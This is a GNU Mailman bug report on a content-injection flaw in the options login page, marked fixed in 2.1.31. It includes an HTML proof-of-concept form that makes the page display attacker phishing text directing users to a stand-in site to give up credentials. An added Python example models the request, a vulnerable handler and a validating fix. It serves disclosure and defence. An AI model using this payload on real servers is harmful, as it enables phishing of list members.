Arbitrary Content Injection via the options login page.

Bug #1873722 reported by Mark Sapiro on 2020-04-20
This bug affects 1 person

Affects: GNU Mailman
Status: Fix Released
Importance: Medium
Assigned to: Mark Sapiro
Milestone: 2.1.31

Bug Description

An issue similar to CVE-2018-13796 (https://www.cvedetails.com/cve/CVE-2018-13796/) exists at a different endpoint and parameter. It can lead to a phishing attack.

Steps To Reproduce:

1. Copy and save the following HTML code and open it in any browser.
Code:

<html>
  <body>
    <!-- Rewrite the displayed URL path to "/" so the address bar does not show the PoC file name -->
    <script>history.pushState('', '', '/')</script>
    <!-- Target: the options login page of the "mailman" list on the victim server -->
    <form action="https://example.com/mailman/options/mailman" method="POST">
      <!-- Attacker-chosen text in the "email" field; HTML entities encode spaces, ":", "/", "." and "@" -->
      <input type="hidden" name="email" value="Your&#32;account&#32;has&#32;been&#32;hacked&#46;&#32;Kindly&#32;go&#32;to&#32;https&#58;&#47;&#47;badsite&#46;com&#32;or&#32;share&#32;your&#32;credentials&#32;at&#32;attacker&#64;badsite&#46;com" />
      <!-- Remaining fields are exactly what the real options login form submits -->
      <input type="hidden" name="UserOptions" value="Unsubscribe&#32;or&#32;edit&#32;options" />
      <input type="hidden" name="language" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. It can be seen there: the message "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at <email address hidden>" will be displayed on the screen.
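
The exchange the steps above describe, as an added example that is neither the reporter's nor Mailman's own code: a Python model that builds the same POST body the PoC form sends, parses it server-side, renders it through a hypothetical and deliberately simplified options handler, and checks whether the submitted text comes back verbatim. The functions vulnerable_options_page and hardened_options_page, the address regex and the payload string are assumptions constructed for this example; the fix shown is the general pattern for this class of bug (only echo input that is shaped like an address, otherwise print a generic notice) and is not a claim about how Mailman 2.1.31 patched it. The point worth noticing is that HTML-escaping alone does not close the hole: the payload is plain persuasive text with no markup, so it survives escaping unchanged.

```python
"""Added example (not Mailman code): model the options-page content injection and a validating fix."""
import html
import re
from urllib.parse import parse_qs, urlencode

# Constructed from the PoC form in the report: the attacker text goes into the "email" field.
PAYLOAD = ("Your account has been hacked. Kindly go to https://badsite.com "
           "or share your credentials at attacker@badsite.com")


def build_post_body(email, language="en"):
    """Client side: encode the three fields the PoC form posts to /mailman/options/<listname>."""
    return urlencode({
        "email": email,
        "UserOptions": "Unsubscribe or edit options",
        "language": language,
    })


def parse_post_body(body):
    """Server side: recover the submitted 'email' field (first value, or empty string)."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("email", [""])[0]


def vulnerable_options_page(email):
    """Hypothetical, simplified model of the pre-fix behaviour: whatever was typed in the
    'email' box is echoed back inside the 'no such member' notice. Escaping is applied,
    and it does not help, because the payload contains no markup, only persuasive text."""
    return "<p>No such member: %s.</p>" % html.escape(email)


# Hypothetical, deliberately strict shape check: one local part, one '@', a dotted domain,
# and no whitespace, quote or angle-bracket characters anywhere.
_ADDRESS_RE = re.compile(r"^[^\s@<>\"']+@[^\s@<>\"']+\.[^\s@<>\"']+$")


def is_plausible_address(value):
    """True only for input that could be an e-mail address; free text never passes."""
    return bool(_ADDRESS_RE.match(value))


def hardened_options_page(email):
    """Fixed model: only something shaped like an address is echoed (escaped);
    anything else gets a generic notice, so attacker prose never reaches the page."""
    if not is_plausible_address(email):
        return "<p>No such member.</p>"
    return "<p>No such member: %s.</p>" % html.escape(email)


def reflects_payload(response_html, payload):
    """Detection check: does the response carry the attacker text verbatim?
    The escaped form is checked too, since a server may escape quotes and ampersands."""
    return payload in response_html or html.escape(payload) in response_html


def run_scenario(handler, payload=PAYLOAD):
    """Drive client -> server -> page for one handler; returns (page, reflected)."""
    body = build_post_body(payload)
    submitted = parse_post_body(body)
    page = handler(submitted)
    return page, reflects_payload(page, payload)


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_options_page),
                          ("hardened", hardened_options_page)):
        page, reflected = run_scenario(handler)
        print("%-10s reflected=%s  %s" % (name, reflected, page))
```

Running the file prints one line per handler. Against a live list the same check is the output of build_post_body(PAYLOAD) sent as a POST to /mailman/options/<listname>, with reflects_payload() run over the response body; on a server carrying the fix the attacker text should not come back.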

Mark Sapiro (msapiro) on 2020-05-05
Changed in mailman:
milestone: none → 2.1.31
status: Confirmed → Fix Released
information type: Private Security → Public